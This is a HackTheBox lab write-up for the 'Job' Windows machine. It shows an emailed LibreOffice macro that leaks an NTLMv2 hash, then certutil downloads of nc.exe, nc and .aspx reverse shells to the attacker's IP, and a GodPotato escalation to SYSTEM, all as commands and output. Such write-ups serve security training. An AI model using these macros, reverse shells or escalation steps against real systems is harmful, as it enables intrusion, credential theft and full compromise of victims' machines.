HackTheBox: Job Writeup

Enumeration

nmap

┌──(kali㉿kali)-[~/Desktop/htb/Job]
└─$ sudo nmap -sT -sV -sC 10.129.234.73 -oA nmap/nmap
[sudo] password for kali: 
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-25 16:08 CEST
Nmap scan report for 10.129.234.73
Host is up (0.086s latency).
Not shown: 995 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
25/tcp   open  smtp          hMailServer smtpd
| smtp-commands: JOB, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: Job.local
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: JOB
|   NetBIOS_Domain_Name: JOB
|   NetBIOS_Computer_Name: JOB
|   DNS_Domain_Name: job
|   DNS_Computer_Name: job
|   Product_Version: 10.0.20348
|_  System_Time: 2025-10-25T14:09:40+00:00
|_ssl-date: 2025-10-25T14:10:20+00:00; +29s from scanner time.
| ssl-cert: Subject: commonName=job
| Not valid before: 2025-09-04T13:43:05
|_Not valid after:  2026-03-06T13:43:05
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: JOB; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: mean: 28s, deviation: 0s, median: 27s
| smb2-time: 
|   date: 2025-10-25T14:09:46
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.45 seconds

The nmap scan shows different interesting ports.

I can see that SMTP is running on port 25, as well as IIS on port 80. Besides that we have port 445 (SMB), port 3389 (RDP) and 5985 (WinRM) which I consider can be helpful after gaining a foothold. I’ll focus on port 25 and port 80.

Website

Upon opening the website I discover that our target is looking for new developers. Applicants should send e-mails to career@job.local – as a .pdf or .odt. The latter is pretty interesting to me.

.odt is used by LibreOffice Writer where it is possible to create different macros.

So my first thought is to send a malicious .odt, catch a NTLMv2 Hash, crack it and get a foothold.

Getting the hash

Creating a malicious .odt

Creating the malicious macro is pretty simple, I’ll use the Shell() function and execute a command which connects to a SMB share on my host. I’ll use Responder to catch the hash.

REM  *****  BASIC  *****

Sub Main

	Shell("cmd.exe /c net use * \\10.10.14.192\share")

End Sub

It is important to set the Macro Security to low and to trigger to macro upon opening the document.

Delivery

To catch the NTLMv2 Hash I’ll start Responder.

┌──(kali㉿kali)-[~/Desktop/htb/Job]
└─$ sudo responder -I tun0

I’ll use sendemail to send malicious .odt to carrer@job.local. As the target has an open SMTP server, I’ll specify it as the SMTP server.

┌──(kali㉿kali)-[~/Desktop/htb/Job]
└─$ sendemail -f applicant@applicant.htb -t career@job.local -u "My Application" -m "Heres my Resume." -a application.odt -s 10.129.234.73:25
Oct 26 17:45:03 kali sendemail[3881]: Email was sent successfully!

And shortly after delivering the e-mail..

[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.129.234.73
[SMB] NTLMv2-SSP Username : JOB\jack.black
[SMB] NTLMv2-SSP Hash     : jack.black::JOB:27915511c5e1c97c:F7A262EA068EA1B9CBB3692E2E16BE07:01010000000000008082E4B89F46DC017C6E55F8077AAE3C00000000020008004A00420042004D0001001E00570049004E002D005700560051004100340043004F004C004E005300500004003400570049004E002D005700560051004100340043004F004C004E00530050002E004A00420042004D002E004C004F00430041004C00030014004A00420042004D002E004C004F00430041004C00050014004A00420042004D002E004C004F00430041004C00070008008082E4B89F46DC01060004000200000008003000300000000000000000000000002000009CF125BBE850DC4662AAE616006E8653CD51D98C5753C204D12AC60D30B735210A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003100390032000000000000000000

Responder catches the NTLMv2 Hash. Unfortunately cracking the hash did not work. However now I know that the target does interact with the .odt and that we can execute commands with the Shell() function.

I’ll try to get a RevShell next.

Getting a RevShell

Creating another malicious .odt

My plan is to firstly download nc.exe from my host and then execute nc.exe with another malicious .odt in order to get a RevShell. Most probably this could be done with only one .odt, however I chose to create two different documents.

The first step is to create a macro that downloads nc.exe. For that, I’ll copy the nc.exe to my http directory and start a Python Web Server.

┌──(kali㉿kali)-[~/Desktop/htb/Job/http]
└─$ cp /usr/share/windows-binaries/nc.exe .

I’ll then use certutil.exe inside the Shell() function to download nc.exe.

certutil.exe -urlcache -split -f http://10.10.14.192/nc.exe 'C:\Windows\Temp\nc.exe'

The e-mail will be send using sendemail.

After a couple of seconds I can see that the target downloaded nc.exe:

┌──(kali㉿kali)-[~/Desktop/htb/Job/http]
└─$ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.234.73 - - [26/Oct/2025 18:36:57] "GET /nc.exe HTTP/1.1" 200 -
10.129.234.73 - - [26/Oct/2025 18:36:57] "GET /nc.exe HTTP/1.1" 200 -

Now I’ll create another .odt file which starts nc.exe and connects to our RevShell. I’ll use the following command inside Shell() function:

cmd.exe /c C:\Windows\Temp\nc.exe 10.10.14.192 9001 -e cmd.exe

Before sending the email, I’ll start listening for connections on Port 9001:

┌──(kali㉿kali)-[~/Desktop/htb/Job]
└─$ rlwrap nc -lnvp 9001
listening on [any] 9001 ...

After successfully delivering the e-mail I get a RevShell as jack.black:

┌──(kali㉿kali)-[~/Desktop/htb/Job]
└─$ rlwrap nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.10.14.192] from (UNKNOWN) [10.129.234.73] 58872
Microsoft Windows [Version 10.0.20348.4052]
(c) Microsoft Corporation. All rights reserved.

C:\Program Files\LibreOffice\program>whoami
whoami
job\jack.black

I’ll quickly grab the user.txt and then move on to PrivEsc.

C:\Users\jack.black\Desktop> more user.txt
more user.txt
c54...

Privilege Escalation

Access as iis apppool\defaultapppool

The captured user jack.black is a member of the developers group. This group has Write-Access to C:\inetpub\wwwroot. My plan is to create a .aspx RevShell in order to get access as the IIS Apppool user.

There are many different .aspx shells, I’ll use this one: https://gist.github.com/qtc-de/19dfc9018685fce1ba2092c8e2382a79

I’ll download this shell to my host, adjust the IP and port. Start nc to listen for connections, deliver the shell to the target, and execute it via the browser.

C:\inetpub\wwwroot>certutil.exe -urlcache -f http://10.10.14.192/rev.aspx rev.aspx
certutil.exe -urlcache -f http://10.10.14.192/rev.aspx rev.aspx
****  Online  ****
CertUtil: -URLCache command completed successfully.

Starting to listen on port 9002:

┌──(kali㉿kali)-[~/Desktop/htb/Job]
└─$ rlwrap nc -lnvp 9002
listening on [any] 9002 ...

Then I’ll open the shell through my browser: 10.129.234.73/rev.aspx

And there it is – a Shell as iis apppool\defaultapppool.

┌──(kali㉿kali)-[~/Desktop/htb/Job]
└─$ rlwrap nc -lnvp 9002
listening on [any] 9002 ...
connect to [10.10.14.192] from (UNKNOWN) [10.129.234.73] 58885
Microsoft Windows [Version 10.0.20348.4052]
(c) Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool

Abusing SeImpersonatePrivilege

iis apppool\defaultapppool has the SeImpersonatePrivilege:

c:\windows\system32\inetsrv>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

Now this is a really easy PrivEsc – I’ll get GodPotato and run it.

Firstly I’ll download it to the target:

:\Users\Public\Downloads>certutil.exe -urlcache -f http://10.10.14.192/GodPotato-NET2.exe GodPotato-NET2.exe
certutil.exe -urlcache -f http://10.10.14.192/GodPotato-NET2.exe GodPotato-NET2.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.

I’ll start my third shell and then execute GodPotato:

C:\Users\Public\Downloads>GodPotato-NET2.exe -cmd "cmd /c C:\Windows\Temp\nc.exe 10.10.14.192 9003 -e cmd.exe"

And there is my NT AUTHORITY\SYSTEM shell:

connect to [10.10.14.192] from (UNKNOWN) [10.129.234.73] 58906
Microsoft Windows [Version 10.0.20348.4052]
(c) Microsoft Corporation. All rights reserved.

C:\Users\Public\Downloads>whoami
whoami
nt authority\system

I’ll grab the flag and call it a day.

C:\Users\Administrator\Desktop>more root.txt
more root.txt
309..